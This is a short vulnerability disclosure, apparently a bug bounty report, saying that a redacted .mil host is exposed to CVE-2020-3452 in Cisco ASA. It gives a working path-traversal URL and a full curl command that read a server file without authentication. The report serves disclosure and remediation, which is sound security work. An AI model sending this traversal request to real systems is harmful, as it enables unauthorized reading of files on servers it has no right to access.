[CVE-2020-3452] Unauthenticated file read in Cisco ASA

Hey, I found out that host `████████.mil` was vulnerable to CVE-2020-3452. You can test it by visiting the URL: ``` https://██████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua ``` To try it with CURL please run the following command: ``` curl -i -s -k -X $'GET' \ -H $'Host: ███████.mil' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \ $'https://████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua' ``` ███████ Reference: * https://www.secpod.com/blog/cve-2020-3452-affecting-85000-cisco-asa-ftd-devices/ * https://twitter.com/aboul3la/status/1286012324722155525 ## Impact Anyone can read any file present on the server.